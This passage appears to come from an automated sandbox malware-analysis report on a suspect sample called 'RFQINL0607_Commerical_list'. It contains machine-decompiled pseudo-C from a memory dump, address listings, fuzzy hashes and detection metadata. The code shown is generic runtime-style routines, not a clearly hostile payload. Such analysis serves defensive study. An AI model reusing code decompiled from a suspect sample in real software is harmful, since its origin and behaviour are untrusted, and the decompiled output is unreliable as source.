										 *((intOrPtr*)(_t80 + 8)) =  *((intOrPtr*)(_t97 - 0x16c));
										_t57 = _t92 + 0x118;
										_t90 =  *(_t57 + 4);
										__eflags =  *_t90 - _t57;
										if( *_t90 != _t57) {
											_t80 = 3;
											asm("int 0x29");
										}
										 *_t80 = _t57;
										 *(_t80 + 4) = _t90;
										 *_t90 = _t80;
										 *(_t57 + 4) = _t80;
										_t86 = (( *(_t92 + 0x10c) & 0xfffff000) + 0x00001000 ^  *(_t92 + 0x10c)) & 0x007ff000 ^  *(_t92 + 0x10c);
										 *(_t92 + 0x10c) = _t86;
										_t61 = _t86 >> 0x0000000b ^ _t86;
										__eflags = _t61 & 0x00000ffe;
										if((_t61 & 0x00000ffe) == 0) {
											_t74 = 1;
										}
										_t45 = E333624D0(_t94);
										__eflags = _t74;
										if(_t74 != 0) {
											_t45 = E33391BB0(_t92 + 0x114);
										}
										goto L12;
									} else {
										_t63 =  *0x33446644; // 0x0
										E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t63 + 0xc0000,  *(_t97 - 0x10c));
										goto L11;
									}
								}
								L18:
								__eflags = _t92 -  *0x33446888; // 0x3066da8
								if(__eflags == 0) {
									_t89 = 0x3344688c;
									_t77 = 0x33446888;
									L15:
									_t45 = E33352712(_t74, _t77, _t89, _t92, _t94, __eflags);
									L16:
									__eflags = _t94 | 0xffffffff;
									return _t45;
								}
								_t96 = _t94 | 0xffffffff;
								__eflags = _t96;
								_t46 = _t96;
								asm("lock xadd [edi], eax");
								if(__eflags == 0) {
									return E3334B705(_t74, _t92, _t92, _t96, __eflags);
								}
								return _t46;
								goto L34;
							} else {
								L11:
								_t45 = E333624D0(_t94);
							}
						}
					}
					L12:
					__eflags =  *((char*)(_t97 - 0xf2));
					if( *((char*)(_t97 - 0xf2)) == 0) {
						goto L16;
					}
					__eflags = _t92 -  *0x33446890; // 0x2fe07c0
					if(__eflags == 0) {
						_t89 = 0x33446894;
						_t77 = 0x33446890;
						goto L15;
					}
					goto L18;
				} else {
					L33362330( *((intOrPtr*)(_t97 - 0x120)) + 0x250,  *((intOrPtr*)(_t97 - 0x120)) + 0x250);
					 *((intOrPtr*)(_t97 - 4)) = 0xa;
					_t70 =  *((intOrPtr*)(_t97 - 0xf0));
					 *((intOrPtr*)(_t97 - 0x178)) = _t70;
					_t87 =  *((intOrPtr*)(_t97 - 0xec));
					_t91 = _t97 - 0xf0;
					__eflags =  *((intOrPtr*)(_t70 + 4)) - _t91;
					if( *((intOrPtr*)(_t70 + 4)) != _t91) {
						L21:
						asm("int 0x29");
						return E333624D0( *((intOrPtr*)(_t97 - 0x120)) + 0x250);
					} else {
						__eflags =  *_t87 - _t91;
						if( *_t87 != _t91) {
							goto L21;
						} else {
							 *_t87 = _t70;
							 *((intOrPtr*)(_t70 + 4)) = _t87;
							 *((intOrPtr*)(_t97 - 4)) = 1;
							_t45 = E33356167();
							goto L8;
						}
					}
				}
				L34:
			}
























                                                                                                                                                                                  0x33356074
                                                                                                                                                                                  0x33356074
                                                                                                                                                                                  0x33356074
                                                                                                                                                                                  0x33356078
                                                                                                                                                                                  0x333b0a1c
                                                                                                                                                                                  0x333b0a21
                                                                                                                                                                                  0x333b0a21
                                                                                                                                                                                  0x3335607e
                                                                                                                                                                                  0x33356085
                                                                                                                                                                                  0x33356087
                                                                                                                                                                                  0x33356087
                                                                                                                                                                                  0x3335608e
                                                                                                                                                                                  0x33356095
                                                                                                                                                                                  0x333560e9
                                                                                                                                                                                  0x333560e9
                                                                                                                                                                                  0x333560f0
                                                                                                                                                                                  0x333560f2
                                                                                                                                                                                  0x333560f8
                                                                                                                                                                                  0x333560fd
                                                                                                                                                                                  0x33356104
                                                                                                                                                                                  0x33356106
                                                                                                                                                                                  0x33356108
                                                                                                                                                                                  0x3335610c
                                                                                                                                                                                  0x33356111
                                                                                                                                                                                  0x3335611b
                                                                                                                                                                                  0x333b0a35
                                                                                                                                                                                  0x333b0a4e
                                                                                                                                                                                  0x333b0a53
                                                                                                                                                                                  0x333b0a59
                                                                                                                                                                                  0x333b0a5b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b0a61
                                                                                                                                                                                  0x333b0a61
                                                                                                                                                                                  0x333b0a63
                                                                                                                                                                                  0x333b0a65
                                                                                                                                                                                  0x333b0a6d
                                                                                                                                                                                  0x333b0a6e
                                                                                                                                                                                  0x333b0a70
                                                                                                                                                                                  0x333b0a72
                                                                                                                                                                                  0x333b0a74
                                                                                                                                                                                  0x333b0a79
                                                                                                                                                                                  0x333b0a7b
                                                                                                                                                                                  0x333b0aa7
                                                                                                                                                                                  0x333b0aad
                                                                                                                                                                                  0x333b0ab0
                                                                                                                                                                                  0x333b0ab6
                                                                                                                                                                                  0x333b0ab9
                                                                                                                                                                                  0x333b0abb
                                                                                                                                                                                  0x333b0abd
                                                                                                                                                                                  0x333b0ac2
                                                                                                                                                                                  0x333b0ac2
                                                                                                                                                                                  0x333b0ac4
                                                                                                                                                                                  0x333b0ac6
                                                                                                                                                                                  0x333b0ac9
                                                                                                                                                                                  0x333b0acb
                                                                                                                                                                                  0x333b0aea
                                                                                                                                                                                  0x333b0aec
                                                                                                                                                                                  0x333b0af7
                                                                                                                                                                                  0x333b0af9
                                                                                                                                                                                  0x333b0afe
                                                                                                                                                                                  0x333b0b00
                                                                                                                                                                                  0x333b0b00
                                                                                                                                                                                  0x333b0b03
                                                                                                                                                                                  0x333b0b08
                                                                                                                                                                                  0x333b0b0a
                                                                                                                                                                                  0x333b0b17
                                                                                                                                                                                  0x333b0b17
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b0a7d
                                                                                                                                                                                  0x333b0a7d
                                                                                                                                                                                  0x333b0a97
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b0a97
                                                                                                                                                                                  0x333b0a7b
                                                                                                                                                                                  0x3335614b
                                                                                                                                                                                  0x3335614b
                                                                                                                                                                                  0x33356151
                                                                                                                                                                                  0x333b0b21
                                                                                                                                                                                  0x333b0b26
                                                                                                                                                                                  0x33356142
                                                                                                                                                                                  0x33356142
                                                                                                                                                                                  0x33356147
                                                                                                                                                                                  0x33356147
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33356147
                                                                                                                                                                                  0x33356157
                                                                                                                                                                                  0x33356157
                                                                                                                                                                                  0x3335615a
                                                                                                                                                                                  0x3335615c
                                                                                                                                                                                  0x33356160
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b0b32
                                                                                                                                                                                  0x3335614a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33356121
                                                                                                                                                                                  0x33356121
                                                                                                                                                                                  0x33356122
                                                                                                                                                                                  0x33356122
                                                                                                                                                                                  0x3335611b
                                                                                                                                                                                  0x33356104
                                                                                                                                                                                  0x33356127
                                                                                                                                                                                  0x33356127
                                                                                                                                                                                  0x3335612e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33356130
                                                                                                                                                                                  0x33356136
                                                                                                                                                                                  0x33356138
                                                                                                                                                                                  0x3335613d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3335613d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33356097
                                                                                                                                                                                  0x333560a3
                                                                                                                                                                                  0x333560a8
                                                                                                                                                                                  0x333560af
                                                                                                                                                                                  0x333560b5
                                                                                                                                                                                  0x333560bb
                                                                                                                                                                                  0x333560c1
                                                                                                                                                                                  0x333560c7
                                                                                                                                                                                  0x333560ca
                                                                                                                                                                                  0x333b076d
                                                                                                                                                                                  0x333b0772
                                                                                                                                                                                  0x33356073
                                                                                                                                                                                  0x333560d0
                                                                                                                                                                                  0x333560d0
                                                                                                                                                                                  0x333560d2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333560d8
                                                                                                                                                                                  0x333560d8
                                                                                                                                                                                  0x333560da
                                                                                                                                                                                  0x333560dd
                                                                                                                                                                                  0x333560e4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333560e4
                                                                                                                                                                                  0x333560d2
                                                                                                                                                                                  0x333560ca
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f8808bbefcca00903945daf25be81b07e3b54679e2ce664cb65d7ef58433ff2b
                                                                                                                                                                                  • Instruction ID: b2eb238d2056b7b445f1a5cff5baa69daaf847442f6dd49065af7a45d730a5a8
                                                                                                                                                                                  • Opcode Fuzzy Hash: f8808bbefcca00903945daf25be81b07e3b54679e2ce664cb65d7ef58433ff2b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2151B1B4D843069BEB15CF24CC40BE9B7B4AF01318F14C2A9E459A76D1DB789A85CF80
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334B0D6 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c8555309939d9e823e3933b4c376a954576d9ec8fa991aa820dd688bf6cfbdc4
                                                                                                                                                                                  • Instruction ID: 0f186604405fc96b940813cf5ac1b64aed61acb9a21f2a66f239dfbd0a243514
                                                                                                                                                                                  • Opcode Fuzzy Hash: c8555309939d9e823e3933b4c376a954576d9ec8fa991aa820dd688bf6cfbdc4
                                                                                                                                                                                  • Instruction Fuzzy Hash: BC4179B1A81701EFE711DF68CC80B56BBE8EF04794F04C469E582DBA90DB74D944CB90
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 334181EE Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                  • Instruction ID: 880f1e8a68f2cc222832446b511ab1c73204f1c035491b4f013b353d564fbdaf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2241C675F00A19AFDB05CF99C880AAFB7BAEF88741F584069E805A7341DA74DE11C764
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3337A390 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                                  			E3337A390(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t38;
				char _t39;
				intOrPtr _t42;
				signed int* _t43;
				signed int _t44;
				signed int _t48;
				char _t59;
				intOrPtr* _t62;
				intOrPtr _t63;
				signed int _t68;
				intOrPtr _t70;
				signed int _t74;
				signed int _t77;
				void* _t78;

				_push(0x20);
				_push(0x3342c520);
				_t38 = E333A7BE4(__ebx, __edi, __esi);
				_t59 = 0;
				 *((char*)(_t78 - 0x19)) = 0;
				if( *((intOrPtr*)(_t78 + 8)) == 0) {
					_t39 = 0;
					L7:
					 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0x10));
					return _t39;
				}
				L33362330(_t38, 0x334467e8);
				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
				_t77 =  *0x33444f44; // 0x4
				if(_t77 == 0) {
					_t59 = 1;
					L28:
					 *((char*)(_t78 - 0x19)) = _t59;
					L6:
					 *(_t78 - 4) = 0xfffffffe;
					E3337A4D8();
					_t39 = _t59;
					goto L7;
				}
				_t74 = _t77;
				 *(_t78 - 0x24) = _t74;
				_t42 =  *0x33444f40; // 0x2fefdc8
				 *((intOrPtr*)(_t78 - 0x20)) = _t42;
				while(_t74 > 0) {
					_t68 = _t74 << 5;
					if( *((intOrPtr*)(_t68 + _t42 - 0x1c)) ==  *((intOrPtr*)(_t78 + 8))) {
						_t13 = _t42 - 0x20; // 0x2fefda8
						_t62 = _t13 + _t68;
						 *((intOrPtr*)(_t78 - 0x28)) = _t62;
						_t15 = _t62 + 0x10; // 0x2fefdb8
						_t43 = _t15;
						 *(_t78 - 0x2c) = _t43;
						_t44 =  *_t43;
						if(_t44 == 0) {
							L21:
							_t63 =  *((intOrPtr*)(_t78 - 0x20));
							L16:
							if(_t74 != _t77) {
								_t28 = _t74 - 1; // 0x3
								E3334B64E(_t28);
							}
							_t77 = _t77 - 1;
							 *0x33444f44 = _t77;
							if(_t77 == 0) {
								E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t63);
								_t42 = 0;
								 *((intOrPtr*)(_t78 - 0x20)) = 0;
								 *0x33444f40 = 0;
								 *0x33444f48 =  *0x33444f48 & 0;
								L24:
								_t74 =  *(_t78 - 0x24);
								_t77 =  *0x33444f44; // 0x4
								L20:
								_t59 = 1;
								 *((char*)(_t78 - 0x19)) = 1;
								goto L5;
							}
							_t48 =  *0x33444f48; // 0x20
							_t49 = _t48 + 0xffffffe0;
							if(_t77 < _t48 + 0xffffffe0) {
								_t42 = E33362710( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t63, _t49 << 5);
								 *((intOrPtr*)(_t78 - 0x20)) = _t42;
								if(_t42 == 0) {
									_t59 = 0;
									goto L28;
								}
								 *0x33444f40 = _t42;
								 *0x33444f48 =  *0x33444f48 - 0x20;
								goto L24;
							}
							_t42 =  *((intOrPtr*)(_t78 - 0x20));
							goto L20;
						}
						_t70 =  *((intOrPtr*)(_t78 + 0xc));
						if(_t70 != 0) {
							if(_t70 !=  *_t62) {
								goto L21;
							}
						}
						if(_t44 == 0xffffffff) {
							goto L21;
						}
						_push(_t44 & 0xfffffffc);
						if( *((intOrPtr*)(_t62 + 0x1c)) == 0xc0000019) {
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							E33363BC0();
							_t74 =  *(_t78 - 0x24);
							_t62 =  *((intOrPtr*)(_t78 - 0x28));
						} else {
							_push(0xffffffff);
							E33392C50();
						}
						if( *(_t62 + 0x14) != 0) {
							_t20 = _t62 + 0x14; // 0x0
							_push( *_t20);
							E33392A80();
							 *(_t62 + 0x14) =  *(_t62 + 0x14) & 0x00000000;
						}
						 *( *(_t78 - 0x2c)) =  *( *(_t78 - 0x2c)) & 0x00000000;
						_t77 =  *0x33444f44; // 0x4
						_t63 =  *0x33444f40; // 0x2fefdc8
						 *((intOrPtr*)(_t78 - 0x20)) = _t63;
						goto L16;
					}
					L5:
					_t74 = _t74 - 1;
					 *(_t78 - 0x24) = _t74;
				}
				goto L6;
			}

















                                                                                                                                                                                  0x3337a390
                                                                                                                                                                                  0x3337a392
                                                                                                                                                                                  0x3337a397
                                                                                                                                                                                  0x3337a39c
                                                                                                                                                                                  0x3337a39e
                                                                                                                                                                                  0x3337a3a5
                                                                                                                                                                                  0x333bdfaa
                                                                                                                                                                                  0x3337a3fa
                                                                                                                                                                                  0x3337a3fd
                                                                                                                                                                                  0x3337a409
                                                                                                                                                                                  0x3337a409
                                                                                                                                                                                  0x3337a3b0
                                                                                                                                                                                  0x3337a3b5
                                                                                                                                                                                  0x3337a3b9
                                                                                                                                                                                  0x3337a3c1
                                                                                                                                                                                  0x333bdfb1
                                                                                                                                                                                  0x333bdfb7
                                                                                                                                                                                  0x333bdfb7
                                                                                                                                                                                  0x3337a3ec
                                                                                                                                                                                  0x3337a3ec
                                                                                                                                                                                  0x3337a3f3
                                                                                                                                                                                  0x3337a3f8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337a3f8
                                                                                                                                                                                  0x3337a3c7
                                                                                                                                                                                  0x3337a3c9
                                                                                                                                                                                  0x3337a3cc
                                                                                                                                                                                  0x3337a3d1
                                                                                                                                                                                  0x3337a3d4
                                                                                                                                                                                  0x3337a3da
                                                                                                                                                                                  0x3337a3e4
                                                                                                                                                                                  0x3337a40c
                                                                                                                                                                                  0x3337a40f
                                                                                                                                                                                  0x3337a411
                                                                                                                                                                                  0x3337a414
                                                                                                                                                                                  0x3337a414
                                                                                                                                                                                  0x3337a417
                                                                                                                                                                                  0x3337a41a
                                                                                                                                                                                  0x3337a41e
                                                                                                                                                                                  0x3337a49d
                                                                                                                                                                                  0x3337a49d
                                                                                                                                                                                  0x3337a471
                                                                                                                                                                                  0x3337a473
                                                                                                                                                                                  0x3337a4a2
                                                                                                                                                                                  0x3337a4a5
                                                                                                                                                                                  0x3337a4a5
                                                                                                                                                                                  0x3337a475
                                                                                                                                                                                  0x3337a478
                                                                                                                                                                                  0x3337a47e
                                                                                                                                                                                  0x3337a4b8
                                                                                                                                                                                  0x3337a4bd
                                                                                                                                                                                  0x3337a4bf
                                                                                                                                                                                  0x3337a4c2
                                                                                                                                                                                  0x3337a4c7
                                                                                                                                                                                  0x3337a4cd
                                                                                                                                                                                  0x3337a4cd
                                                                                                                                                                                  0x3337a4d0
                                                                                                                                                                                  0x3337a493
                                                                                                                                                                                  0x3337a493
                                                                                                                                                                                  0x3337a495
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337a495
                                                                                                                                                                                  0x3337a480
                                                                                                                                                                                  0x3337a485
                                                                                                                                                                                  0x3337a48a
                                                                                                                                                                                  0x333bdff8
                                                                                                                                                                                  0x333bdffd
                                                                                                                                                                                  0x333be002
                                                                                                                                                                                  0x333bdfb5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bdfb5
                                                                                                                                                                                  0x333be004
                                                                                                                                                                                  0x333be009
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333be009
                                                                                                                                                                                  0x3337a490
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337a490
                                                                                                                                                                                  0x3337a420
                                                                                                                                                                                  0x3337a427
                                                                                                                                                                                  0x333bdfc2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333bdfc8
                                                                                                                                                                                  0x3337a430
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337a435
                                                                                                                                                                                  0x3337a43d
                                                                                                                                                                                  0x333bdfcd
                                                                                                                                                                                  0x333bdfd5
                                                                                                                                                                                  0x333bdfd8
                                                                                                                                                                                  0x333bdfdd
                                                                                                                                                                                  0x333bdfe0
                                                                                                                                                                                  0x3337a443
                                                                                                                                                                                  0x3337a443
                                                                                                                                                                                  0x3337a445
                                                                                                                                                                                  0x3337a445
                                                                                                                                                                                  0x3337a44e
                                                                                                                                                                                  0x3337a450
                                                                                                                                                                                  0x3337a450
                                                                                                                                                                                  0x3337a453
                                                                                                                                                                                  0x3337a458
                                                                                                                                                                                  0x3337a458
                                                                                                                                                                                  0x3337a45f
                                                                                                                                                                                  0x3337a462
                                                                                                                                                                                  0x3337a468
                                                                                                                                                                                  0x3337a46e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337a46e
                                                                                                                                                                                  0x3337a3e6
                                                                                                                                                                                  0x3337a3e6
                                                                                                                                                                                  0x3337a3e7
                                                                                                                                                                                  0x3337a3e7
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 5d15d3f5fa1d85507d0b93c5fbc7c7c2446ce261cf4b22e8e95800cd5ae8c81e
                                                                                                                                                                                  • Instruction ID: 4114df1cd2d4e470cc931f18a1fc53296ca3445855852db617aa84681391b1f3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d15d3f5fa1d85507d0b93c5fbc7c7c2446ce261cf4b22e8e95800cd5ae8c81e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A419975949304CFEF01DF68D8957AD77F4AF18364F0482A9D810BB791DB3A9981CBA0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3337D600 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: abb2d4070d1bb747d31638c2bc2f869d3489619ad7d5b1d220191d079dab2993
                                                                                                                                                                                  • Instruction ID: bbb036d57d519da5219ffbe0338d712ab0e84c82fc119fa9c7fa1005bc4ed135
                                                                                                                                                                                  • Opcode Fuzzy Hash: abb2d4070d1bb747d31638c2bc2f869d3489619ad7d5b1d220191d079dab2993
                                                                                                                                                                                  • Instruction Fuzzy Hash: F341C3B1905340DFD720EF69C980E6A77F8EF85360F00862DF955A7A61CB38E811CB91
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33380630 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                                                                                                                  • Instruction ID: 22760116a8485450f08a4a9bb25f18fc514c8bd75de9d3ef3c74b5f26ea3dc6c
                                                                                                                                                                                  • Opcode Fuzzy Hash: db222aff31ac99bbcf2dda992de91452d5bad2b8758ffabb997b8c49cee3dcdf
                                                                                                                                                                                  • Instruction Fuzzy Hash: A04159B5A04705EFDB24CF98C980A9AB7F8FF48740B10896DE556EB650D734EA48CF50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3338F523 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 204d44b235d1fa5cc97799038896d92b16b5c874c253a12c40f03b1a1ddf0093
                                                                                                                                                                                  • Instruction ID: 25e0ee0dfff3f69344e4cb7c22451ff220c9b9cc47b46c4e148c5ef49f0eeff5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 204d44b235d1fa5cc97799038896d92b16b5c874c253a12c40f03b1a1ddf0093
                                                                                                                                                                                  • Instruction Fuzzy Hash: 19413CB4E01248DFEB14CFA9E880AEDBBF4BB49700F54826EE499A7201D7349945CF60
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3341D7A7 Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 941f0979108ee7d1dd63e58a424a855e6eecf4c490b4e79172199a2b2b103536
                                                                                                                                                                                  • Instruction ID: d300b0a90eb33f9f1898a0b56aa1087f902e6f5120e21683861db95fdc04b252
                                                                                                                                                                                  • Opcode Fuzzy Hash: 941f0979108ee7d1dd63e58a424a855e6eecf4c490b4e79172199a2b2b103536
                                                                                                                                                                                  • Instruction Fuzzy Hash: D441CCB1A04B018FD3119F29C880B2AB7E5EB85350F08453CE8A6877A1DAB8D865CB59
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33381796 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
